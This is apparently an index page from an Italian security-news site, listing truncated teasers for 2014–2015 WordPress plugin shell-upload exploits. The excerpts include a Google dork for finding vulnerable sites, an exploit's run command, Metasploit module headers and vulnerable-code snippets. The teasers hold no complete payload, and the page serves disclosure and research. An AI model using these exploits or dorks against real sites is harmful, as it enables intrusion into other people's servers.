WordPress Reflex Gallery 3.1.3 Shell Upload

21 marzo 2015 - Fonte: http://www.mondounix.com
<?php
 
/*
  # Exploit Title: Wordpress Plugin Reflex Gallery - Arbitrary File Upload
  # TIPE:          Arbitrary File Upload
  # Google DORK:   inurl:"wp-content/plugins/reflex-gallery/"
  # Vendor:        https://wordpress.org/plugins/reflex-gallery/
  # Tested on:     Linux
  # Version:       3.1.3 (Last)
  # EXECUTE:       php exploit.php www.alvo.com.br shell.php
  # OUTPUT:        Exploit_AFU.txt
  # POC            http://i.imgur.com/mpjXaZ9.png
  # REF COD        http://1337day.com/exploit/23369
 
--------------------------------------------------------------------------------
  <form method = "POST" action = "" enctype = "multipart/form-data" >
  <input type...

Leggi il seguito »

WordPress WP All 3.2.3 Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
------------------------------------------------------------------------------
WordPress WP All Import Plugin RCE
------------------------------------------------------------------------------
 
[-] Vulnerability Author:
 
James Golovich ( @Pritect )
 
[-] Exploit Author
 
Evex ( @Evex_1337 )
 
[-] Plugin Link:
 
https://wordpress.org/plugins/wp-all-import/
 
[-] Affected Version:
 
Version <= 3.2.3
 
 
[-] Vulnerability Description:
 
 
    Retrieve any file on the system that ends in .txt
    Retrieve any file on the system that ends in .html
    Retrieve any value from the postmeta table
    Upload arbitrary files to system
 
 
Reference:
http://www.pritect.net/blog/wp-all-import-3-2-3-pro-4-0-3-vulnerability-breakdown
 
 
[-]...

Leggi il seguito »

WordPress Admin Shell Upload

5 marzo 2015 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex/zip'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Admin Shell Upload',
      'Description'     => %q{
          This module will generate a plugin, pack the payload into it
          and upload it to a server running WordPress providing valid
          admin credentials are used.
        },
      'License'         => MSF_LICENSE,
...

Leggi il seguito »

WordPress Download Manager Unauthenticated File Upload

16 dicembre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
    info,
    'Name'           => 'Wordpress Download Manager (download-manager) Unauthenticated File Upload',
    'Description'    => %q{
      The WordPress download-manager plugin contains multiple unauthenticated file upload
      vulnerabilities which were fixed in version 2.7.5.
    },
    'Author'         =>
    [
      'Mickael Nadeau',    ...

Leggi il seguito »

WordPress WP Symposium 14.11 Shell Upload

14 dicembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27:  Discovered vulnerability
# 2014-12-01:  Vendor Notification (Twitter)
# 2014-12-02:  Vendor Notification (Web Site) 
# 2014-12-04:  Vendor Notification (E-mail)
# 2014-12-11:  No Response/Feedback
# 2014-12-11:  Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
#   if ($_FILES["file"]["error"] > 0)...

Leggi il seguito »

WordPress wpDataTables 1.5.3 Shell Upload

26 novembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/python
#
# Exploit Name: Wordpress wpDataTables 1.5.3 and below Unauthenticated Shell Upload Vulnerability
# 
# Vulnerability discovered by Claudio Viviani
#
# Date : 2014-11-22
#
# Exploit written by Claudio Viviani
#
# Video Demo: https://www.youtube.com/watch?v=44m4VNpeEVc
#
# --------------------------------------------------------------------
#
# Issue n.1 (wpdatatables.php)
#
# This function is always available without wpdatatables edit permission:
#
#    function wdt_upload_file(){
#        require_once(PDT_ROOT_PATH.'lib/upload/UploadHandler.php');
#        $uploadHandler = new UploadHandler();
#        exit();
#    }
#    ...
#    ...
#    ...
#    add_action( 'wp_ajax_wdt_upload_file', 'wdt_upload_file'...

Leggi il seguito »

WordPress InfusionSoft Upload

9 ottobre 2014 - Fonte: http://www.mondounix.com
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
    ...

Leggi il seguito »

WordPress Slideshow Gallery 1.4.6 Shell Upload

16 settembre 2014 - Fonte: http://www.mondounix.com
#!/usr/bin/env python
#
# WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit
#
# WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability (CVE-2014-5460)
#
# Vulnerability discovered by: Jesus Ramirez Pichardo - http://whitexploit.blogspot.mx/
#
# Exploit written by: Claudio Viviani - info@homelab.it - http://www.homelab.it
#
#
# Disclaimer:
#
# This exploit is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
#
#
# Requirements:
#
# 1) Enabled user management...

Leggi il seguito »

WordPress WPtouch Mobile 3.4.5 Shell Upload

27 agosto 2014 - Fonte: http://www.mondounix.com
Wordpress WPtouch Mobile Plugin File Upload Vulnerability
 
=================================
 
 
====================
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/...

Leggi il seguito »

WordPress cnhk-slideshow Shell Upload

19 maggio 2014 - Fonte: http://www.mondounix.com
...

Leggi il seguito »